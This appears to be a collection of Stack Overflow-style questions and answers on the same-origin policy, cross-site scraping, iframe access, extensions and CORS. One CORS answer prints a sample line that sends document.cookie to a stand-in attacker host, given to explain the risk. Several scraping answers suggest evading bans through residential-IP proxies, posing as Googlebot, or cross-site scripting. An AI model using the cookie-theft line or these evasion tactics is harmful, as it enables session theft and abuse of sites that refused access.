Elevating a browser's JavaScript permissions? - javascript

I'm working on an internal tool, and I recall there being some way to make your script prompt for elevated permissions which, if accepted, would allow cross-site requests, etc. As this is an internal tool, this may accomplish something I need.
Does anyone know how to do this?
To elaborate, I'm actually trying to read (in JavaScript) the contents of third-party tracking iframes injected into our page, to gather some performance analytics. These iframes are obviously from a different domain. If I were to proxy them, they would no longer give accurate information, so that option is out.

I don't think you can actually make your script ask for elevated permission, but you can check for it and ask the user to change their browser security level if needed.
Mozilla.org has an interesting article about configurable security policies: http://www.mozilla.org/projects/security/components/ConfigPolicy.html
If you only need to bypass the same-origin policy, you could use other tricks, e.g. a server-side proxy.
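A minimal sketch of such a server-side proxy, assuming Node.js with Express; the /proxy endpoint and the whitelisted host are illustrative, not part of the original answer:

    // Minimal same-origin proxy sketch (Node.js + Express). The page calls
    // /proxy?url=... on its own origin and the server fetches the remote
    // resource, so the browser's same-origin policy never comes into play.
    const express = require('express');
    const app = express();

    app.get('/proxy', async (req, res) => {
      const target = req.query.url;
      // Only forward requests to hosts you explicitly trust.
      if (!/^https:\/\/(www\.)?example\.com\//.test(target)) {
        return res.status(403).send('Forbidden target');
      }
      const upstream = await fetch(target);          // global fetch (Node 18+)
      res.type(upstream.headers.get('content-type') || 'text/plain');
      res.send(await upstream.text());
    });

    app.listen(3000);

Note that, as you said, proxied requests come from your server rather than the client, so this won't suit the tracking-iframe case where the third party needs to see the real visitor.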

For Firefox/Mozilla, I think you mean netscape.security.PrivilegeManager.enablePrivilege() like in this other question.
You'll need the UniversalBrowserRead privilege to allow cross-site AJAX. (I've used it to build a set of local files for a simple stock-ticker page that grabs data from Yahoo's Finance service. The browser asks you, the user, the first time you load that page whether you want to grant the privilege; you don't have to grant it again until you restart the browser and open the same page again.)
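For reference, a minimal sketch of how that call was used; the API is Firefox-only, long deprecated, and removed from modern versions, and the target URL below is illustrative:

    // Deprecated Firefox-only API; it only ever worked after the user
    // accepted the security prompt for the page.
    function fetchCrossSite() {
      netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
      var xhr = new XMLHttpRequest();
      // Illustrative third-party URL; any foreign origin behaves the same way.
      xhr.open("GET", "http://other-domain.example/data.csv", false);
      xhr.send(null);
      return xhr.responseText;
    }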

Related

Browser-based client-side scraping

I wonder if it's possible to scrape an external (cross-domain) page through the user's IP?
For a shopping comparison site, I need to scrape pages of an e-commerce site, but several requests from the server would get me banned, so I'm looking for ways to do client-side scraping, that is, request pages from the user's IP and send them to the server for processing.
No, you won't be able to use your visitors' browsers to scrape content from other websites using JavaScript, because of a security measure called the same-origin policy.
There should be no way to circumvent this policy and that's for a good reason. Imagine you could instruct the browser of your visitors to do anything on any website. That's not something you want to happen automatically.
However, you could create a browser extension to do that. JavaScript browser extensions can be equipped with more privileges than regular JavaScript.
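As a rough illustration of that extra privilege (all names and URLs below are hypothetical), a Chrome extension's manifest can request host permissions that exempt its scripts from the same-origin policy:

    // manifest.json (Manifest V2, trimmed to the relevant parts)
    {
      "name": "scraper-helper",
      "version": "1.0",
      "manifest_version": 2,
      "permissions": ["http://*/*", "https://*/*"],
      "background": { "scripts": ["background.js"] }
    }

    // background.js: with those host permissions, cross-origin requests
    // issued from the extension's background page are allowed.
    fetch('https://shop.example.com/product/123')
      .then(function (response) { return response.text(); })
      .then(function (html) { console.log('Fetched', html.length, 'bytes'); });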
Adobe Flash has similar security features, but I guess you could use Java (not JavaScript) to create a web scraper that uses your users' IP addresses. Then again, you probably don't want to do that, as Java plugins are considered insecure (and slow to load!) and not all users will even have one installed.
So now back to your problem:
I need to scrape pages of an e-com site but several requests from the server would get me banned.
If the owner of that website doesn't want you to use his service in that way, you probably shouldn't do it. Otherwise you would risk legal implications (look here for details).
If you are on the "dark side of the law" and don't care whether it's illegal or not, you could use something like http://luminati.io/ to use the IP addresses of real people.
Basically, browsers are designed to prevent you from doing this…
The solution everyone thinks about first:
jQuery/JavaScript: accessing contents of an iframe
But it will not work in most cases with "recent" browsers (less than 10 years old).
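For illustration, this is the kind of access that gets blocked (the element id is hypothetical):

    // Throws a SecurityError in any modern browser when the iframe points
    // to a different origin than the parent page.
    var frame = document.getElementById('trackingFrame');
    try {
      var doc = frame.contentWindow.document;   // blocked cross-origin
      console.log(doc.body.innerHTML);
    } catch (e) {
      console.log('Blocked by the same-origin policy:', e.name);
    }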
Alternatives are:
Using the official APIs of the server (if any)
Try finding out whether the server provides a JSONP service (good luck; see the JSONP sketch after this list)
If you can get on the same domain, try cross-site scripting (if possible; not very ethical)
Using a trusted relay or proxy (but this will still use your own IP)
Pretend you are a Google web crawler (why not, but not very reliable and with no guarantees)
Use a hack to set up the relay/proxy on the client itself; I can think of Java or possibly Flash (will not work on most mobile devices, slow, and Flash has its own cross-site limitations too)
Ask Google or another search engine for the content (you might then have a problem with the search engine if you abuse it…)
Do the job yourself and cache the answers, in order to reduce the load on their server and decrease the risk of being banned.
Index the site yourself (with your own web crawler), then use your own index (depends on how frequently the source changes).
http://www.quora.com/How-can-I-build-a-web-crawler-from-scratch
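If the server does happen to expose a JSONP endpoint (second item in the list above), the pattern is roughly the following; the endpoint URL and the callback parameter name are assumptions, since the real ones depend entirely on the remote API:

    // JSONP: the remote server wraps its JSON in the callback name we pass.
    function handleData(data) {
      console.log('Received:', data);
    }

    var script = document.createElement('script');
    // 'callback' is the common convention for the parameter name, but the
    // actual endpoint and parameter are whatever the remote API defines.
    script.src = 'https://api.example.com/products?id=42&callback=handleData';
    document.head.appendChild(script);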
[EDIT]
One more solution I can think of is going through a YQL service; in this manner it is a bit like using a search engine / public proxy as a bridge to retrieve the information for you.
Here is a simple example of doing so; in short, you get cross-domain GET requests.
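Roughly, the pattern looked like this; note that YQL has since been retired, the endpoint shape below is from the old public service, and the target URL is illustrative:

    // YQL acted as a public proxy: you asked Yahoo's servers to fetch the
    // page and hand it back via JSONP.
    var yql = 'https://query.yahooapis.com/v1/public/yql' +
              '?q=' + encodeURIComponent(
                'select * from html where url="http://example.com/page"') +
              '&format=json&callback=handleYql';

    function handleYql(response) {
      console.log(response.query.results);
    }

    var s = document.createElement('script');
    s.src = yql;
    document.head.appendChild(s);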
Have a look at http://import.io; they provide a couple of crawlers, connectors and extractors. I'm not entirely sure how they get around bans, but they do somehow (we have been using their system for over a year now with no problems).
You could build a browser extension with artoo.
http://medialab.github.io/artoo/chrome/
That would allow you to get around the same-origin policy restrictions. It is all JavaScript and runs on the client side.

Is display of service calls in browser developer tools like Firebug a security threat?

Note: this is not a duplicate of that question; the concerns are different. I don't want to disable Firebug; let it stay open and let the user use all the functionality it provides. I only want Firebug not to show the service calls.
I may be wrong, but when browser developer tools like Firebug display service calls and their request/response data, is that not a security threat? If not, why not?
If it is, is there any way to hide the display of service calls in Firebug or the developer tools after the build is deployed?
You can see a GET request shown by Firebug in Mozilla Firefox.
I have searched for this but haven't found anything fruitful, and I am also unable to find any post related to this concern on Stack Overflow. If anyone has any information, please share it.
No, this is not a security issue on any properly designed web site / service. The browser, and requests performed by the browser, should all be considered to be under the user's control. (Indeed, from a security perspective, the browser should be considered an extension of the user, rather than something separate from them.) As such, the user viewing something that's under the user's control is not a risk at all.
If your web site is sending data that the user shouldn't be allowed to see in HTTP(S) requests, you've done something wrong. That data should never leave the server at all if it's that sensitive; move the logic that needs it off the client (e.g. JavaScript) and back onto the server side.
If your web application relies on security through obscurity, then exposing those calls would be harmful.
But as long as you make your web application secure, with common vulnerabilities like CSRF and XSS taken care of, then it doesn't matter that anyone can see the requests made and the responses received.

Are there any clear limits of JavaScript in relation to manipulating the browser and DOM?

I heard that getting access to the text of a Gmail email is very difficult if not impossible (iframes).
Are there certain areas where JavaScript is not capable of doing something?
Iframes won't prevent you from accessing content. JavaScript doesn't really have any limits with regard to manipulating the DOM. It can't, however, access files on your computer or be used to upload files and such. It can't read content inside Flash files either. You don't really have any choice other than JS anyway; what kind of roadblocks are you anticipating?
Since you've chosen to use the firefox-addon tag: no, getting access to Gmail text is unproblematic from an add-on. Doing the same from a regular website, however, isn't possible unless that website is hosted on mail.google.com. The reason is a security mechanism called the same-origin policy. Websites are generally limited by the same-origin policy; add-ons are not.
Different browsers have different limitations that they impose on JavaScript as well as different APIs that they provide to JavaScript to grant it access to different forms of data. Until recently, it was not possible for JavaScript to access local files; however, there are now APIs in some browsers to do this.
There is a concept known as the "same origin" policy that is used to ensure that JavaScript running from the context of one domain or protocol cannot access data from another domain or protocol. However, browser add-ons or extensions can often exempt themselves from these restrictions. Also, some browsers provide APIs specifically for communication between different origins; however, these APIs generally require that this is done with the cooperation and permission of both origins.
From extension JS, you can access any part of Gmail. I wrote a browser extension that allowed me to forward a Gmail email to a Facebook contact. It also appeared in Facebook and allowed me to send a Facebook message to a Gmail contact. It was so that I didn't need to worry about adding contacts from Google to Facebook and vice versa.
That extension was easy. Once you get past the iframe piece, it is cake. Good luck!

grant access to Location to framed external site

I'm iframing an external site. That site tries to read location from the parent for analytics reasons, and access is refused (for obvious default security reasons).
Yet I would like to relax that security and answer, because that site is a 'friend', just not on the same domain.
It seems impossible to grant that access... any ideas?
I ran into a similar situation before. Allowing cross-domain JavaScript access through iframes is not possible, since this would result in a cross-site-scripting nightmare. Like the other poster said, you will have to pass this data to them yourself. One way is to set a cookie, containing whatever information they are looking for, that can be read by the other domain (note that this only works if both sites share a parent domain); they can then read the data from the cookie. Your JavaScript can set the cookie when you load the other site in the iframe. For a function to do that, check http://phpjs.org/functions/setcookie:509
If the site is a 'friend' as you say - how about passing them the location data yourself?
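One way to pass it along is window.postMessage; a minimal sketch follows (the element id and the origins are hypothetical):

    // Parent page: send the location to the framed 'friend' site.
    var frame = document.getElementById('friendFrame');
    frame.addEventListener('load', function () {
      frame.contentWindow.postMessage(
        { parentLocation: window.location.href },
        'https://friend.example.com'            // only deliver to this origin
      );
    });

    // Inside the framed site: receive it and check who sent it.
    window.addEventListener('message', function (event) {
      if (event.origin !== 'https://parent-site.example.com') return;
      console.log('Parent location:', event.data.parentLocation);
    });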

Cross-Origin Resource Sharing (CORS) - am I missing something here?

I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand it, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.
So the expanded sequence would be:
Supply a page with a list of acceptable CORS servers (abc.com, xyz.com, etc.)
Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list and authentication proceeds as normal
Page wants to make an XHR request to malicious.com - request rejected locally (ie by the browser) because the server is not in the list.
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even as far back as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests caused by interfaces as simple as form.submit(), new Image, or setting window.location.
If malicious code has access to sensitive information, you have already totally lost.
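For instance, this classic one-liner exfiltrates data without any XHR or CORS at all (the receiving URL is of course made up):

    // A plain GET request; no CORS involvement, the browser happily sends it.
    new Image().src = 'https://evil.example/collect?d=' +
                      encodeURIComponent(document.cookie);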
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to take advantage of the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is not just where data can be sent, but also where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making the cross-domain policy stricter on other tags (script/image), while more secure, would break a lot of existing code and make it much more difficult to adopt the new technology. Hopefully, something will be done to close that security hole, but I think they need to make sure it's an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or—as you've requested here—you can explicitly tell the browser which domains the page is allowed to contact.
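For instance, a policy along these lines (reusing the domains from your example) tells the browser that scripts on the page may only open connections to the listed hosts; it is sent as a single HTTP response header, wrapped here for readability:

    Content-Security-Policy: default-src 'self';
                             connect-src 'self' https://abc.com https://xyz.com;
                             script-src 'self'

With that policy in place, an XHR or fetch to malicious.com is blocked by the browser before it ever leaves the page.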
The problem isn't that a site can access another site's resources that it already had access to. The problem is one of domain -- if I'm using a browser at my company, and an AJAX script maliciously decides to try out 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution -- CORS. I'm not saying it's the best, but it solves this issue.
1) If the gateway can't return the accepted-origin header for 'bobthehacker.com', the response is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an Origin of 'bobthehacker.com'. In the simple CORS case, the server will actually still return the results by default; you can configure the server to not even do that. Either way, the results are discarded by the browser without being exposed to the page.
3) Finally, even if it would accept certain domains, you have some control over the headers that are accepted and rejected to make the request from those sites conform to a certain shape.
Note -- the Origin header and the OPTIONS preflight are controlled by the requester; obviously someone crafting their own HTTP request can put whatever they want in there. However, a modern CORS-compliant browser WON'T do that. It is the browser that controls the interaction. The browser is preventing bobthehacker.com from accessing the gateway. That is the part you are missing.
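As a sketch, a gateway that only trusts the internal origin would answer with headers roughly like these (domains reused from the scenario above); a response without a matching Access-Control-Allow-Origin header is simply discarded by the browser:

    Access-Control-Allow-Origin: https://myinternaldomain.com
    Access-Control-Allow-Methods: GET, POST
    Access-Control-Allow-Headers: Content-Type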
I share David's concerns.
Security must be built layer by layer, and a whitelist served by the origin server seems to be a good approach.
Plus, this whitelist could be used to close existing loopholes (forms, script tags, etc.); it's safe to assume that a server serving such a whitelist is designed to avoid backward-compatibility issues.
